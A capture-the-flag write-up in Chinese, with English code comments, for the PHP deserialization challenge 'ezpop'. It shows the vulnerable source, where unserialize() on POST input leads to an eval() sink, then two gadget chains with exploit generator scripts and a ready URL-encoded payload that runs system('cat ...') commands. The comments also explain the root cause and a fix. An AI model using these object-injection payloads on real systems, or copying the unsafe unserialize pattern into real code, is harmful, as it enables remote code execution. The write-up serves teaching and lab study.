
dasctf_x_su_web1

常规反序列化, 题目名字:ezpop

题目源码

<?php

/**
 * Gadget class. Nothing in the request handler calls these methods directly;
 * they become reachable only because unserialize() lets the sender choose the
 * values of the public properties $v1/$v2 and PHP then dispatches magic methods.
 */
class crow
{
    public $v1;
    public $v2;

    // Instantiates whatever class name is stored in $v1, passing $v2 as the
    // single constructor argument, and echoes the result (so the new object's
    // __toString runs). Neither chain on this page uses it, but it is a second
    // dangerous sink: class name and argument are both attacker-controlled.
    function eval() {
        echo new $this->v1($this->v2);
    }

    // Runs when a crow instance is used as a callable, e.g. `($obj)()`.
    // No class in this file defines world(), so when $v1 is an object with a
    // __call handler (fin below) that handler receives the call instead.
    public function __invoke()
    {
        $this->v1->world();
    }
}

/**
 * Gadget class providing three hooks used by both chains on this page:
 * __destruct (the entry point), run() (calls $f1 as a callable) and
 * __call (forwards any undefined-method call to $f1->get_flag()).
 */
class fin
{
    public $f1;

    // Entry point. It runs automatically when the object is destroyed — here
    // right after unserialize() returns, because the result is discarded.
    // The `.` concatenation forces $f1 to a string, so if $f1 is an object
    // with __toString (what::__toString) that method is executed.
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    // Treats $f1 as a callable; with an object in $f1 this calls its
    // __invoke (crow::__invoke in chain 1).
    public function run()
    {
        ($this->f1)();
    }

    // Catches calls to methods fin does not define (the world() call made by
    // crow::__invoke) and turns them into $f1->get_flag(); with a mix object
    // in $f1 that is the eval() sink. $a (method name) and $b (arguments) are
    // ignored.
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

/**
 * Gadget class: its __toString is the pivot from string context (the
 * concatenation in fin::__destruct) back to a method call on an
 * attacker-supplied object.
 */
class what
{
    public $a;

    // Calls run() on $a — fin::run in chain 1, mix::run in chain 2 — before
    // returning a constant; the return value itself is irrelevant to the chain.
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
/**
 * Gadget class holding the final sink: get_flag() passes the
 * attacker-controlled $m1 straight to eval().
 */
class mix
{
    public $m1;

    // Same shape as fin::run — calls $m1 as a callable (crow::__invoke in chain 2).
    public function run()
    {
        ($this->m1)();
    }

    // Sink. The leading '#' is not a sanitiser: it only comments out the rest
    // of the current line of the evaluated code, so a newline or a closing
    // `?>` tag inside $m1 ends the comment and whatever follows is executed
    // (both payloads on this page rely on exactly that).
    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

// Root cause of the challenge: unserialize() on untrusted POST data
// instantiates any class declared above with sender-chosen property values,
// and PHP then runs their magic methods (__destruct, __toString, __call,
// __invoke) automatically. In real code: exchange data with json_decode()
// instead, or at minimum pass ['allowed_classes' => false] (or an explicit
// whitelist) as the second argument to unserialize(), and keep destructors
// and __toString free of calls on properties a sender can control.
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    // Without a payload the page just shows its own source.
    highlight_file(__FILE__);
}
?>

链子_1

fin::__destruct   //字符串拼接,跳转到toString
what::__toString
fin::run //将实例当作方法调用,跳转到invoke
crow::__invoke //调用不存在的函数world,跳转到call
fin::__call
mix::get_flag

EXP

<?php
/**
 * Local copy used only to build the payload. serialize() records property
 * names and values, never methods, so the original methods are left as a
 * comment for reference and the property layout is kept identical to the
 * target's class.
 */
class crow
{
    public $v1;
    public $v2;
    /*
    function eval() {
    echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
    echo 'get invoke ';
    $this->v1->world();
    }
    */
}

/**
 * Local copy for payload generation: same property layout as the target's
 * fin class, methods kept only as a comment (they are not serialized).
 */
class fin
{
    public $f1;
    /*
    public function __destruct()
    {
    echo 'get destruct ';
    echo $this->f1 . '114514';
    }

    public function run()
    {
    ($this->f1)();
    }

    public function __call($a, $b)
    {
    echo 'get call ';
    echo $this->f1->get_flag();
    }
    */
}

/**
 * Local copy for payload generation: same property layout as the target's
 * what class, method kept only as a comment.
 */
class what
{
    public $a;
    /*
    public function __toString()
    {
    echo 'get toString ';
    $this->a->run();
    return 'hello';
    }
    */
}
/**
 * Local copy for payload generation. Unlike the target's mix, it has a
 * constructor that pre-fills $m1; the methods themselves are kept as a comment.
 */
class mix
{
    public $m1;

    // The leading `?>` is what defeats the '#' prefix that the target's
    // get_flag() puts in front of $m1 before eval(): it closes the PHP block
    // (ending the line comment) and `<?php` reopens it.
    public function __construct()
    {
        $this->m1 = "?> <?php system('cat H*');?>";
    }
    /*
    public function run()
    {
    echo 'get run ';
    ($this->m1)();
    }

    public function get_flag()
    {
    echo 'get it ';
    eval('#'.$this->m1);
    }
    */
}
// Assemble chain 1 (see 链子_1 above) from the outside in:
//   fin->f1 = what, what->a = fin2, fin2->f1 = crow, crow->v1 = fin3, fin3->f1 = mix.
// Three separate fin instances are needed because each plays a different
// role (__destruct, run, __call) and holds a different $f1.
$fin = new fin();
$what = new what();
$fin2 = new fin();
$crow = new crow();
$fin3 = new fin();
$mix = new mix();
$fin3->f1 = $mix;
$crow->v1 = $fin3;
$fin2->f1 = $crow;
$what->a = $fin2;
$fin->f1 = $what;
// URL-encode so the serialized string's quotes, braces and semicolons
// survive transport as a POST body field.
$BB = urlencode(serialize($fin));
print_r($BB);

运行得到payload

O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A28%3A%22%3F%3E+%3C%3Fphp+system%28%27cat+H%2A%27%29%3B%3F%3E%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7D

链子_2

看了别人的wp发现还有其他链子

fin::__destruct
↓↓↓
what::__toString
↓↓↓
mix::run
↓↓↓
crow::__invoke
↓↓↓
fin::__call
↓↓↓
mix::get_flag

其实也相差不大,这条链子是通过mix类的run()函数跳转到crow类中

EXP

<?php
/**
 * Local copy for payload generation (chain 2). Same property layout as the
 * target's crow; a constructor is added only for convenience when nesting.
 */
class crow
{
    public $v1;
    public $v2;

    // $v2 stays null — it is not used by chain 2.
    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

/**
 * Local copy for payload generation (chain 2): same property layout as the
 * target's fin, constructor added for convenience.
 */
class fin
{
    public $f1;

    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

/**
 * Local copy for payload generation (chain 2): same property layout as the
 * target's what, constructor added for convenience.
 */
class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}
/**
 * Local copy for payload generation (chain 2): same property layout as the
 * target's mix. Chain 2 uses two mix instances, one as the run() pivot and
 * one as the eval() sink, so $m1 is passed in rather than hard-coded.
 */
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

}

// Assemble chain 2 (see 链子_2 above) from the inside out:
//   fin($a) -> what($b) -> mix($c, run pivot) -> crow($d) -> fin($e, __call) -> mix($f, sink).
// Here the leading "\n" in $m1 is what ends the '#' line comment that the
// target's get_flag() prepends before eval(), instead of the `?>` used in chain 1.
$f = new mix("\nsystem('cat *');");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
// URL-encoded for transport as a POST body field.
echo urlencode(serialize($a));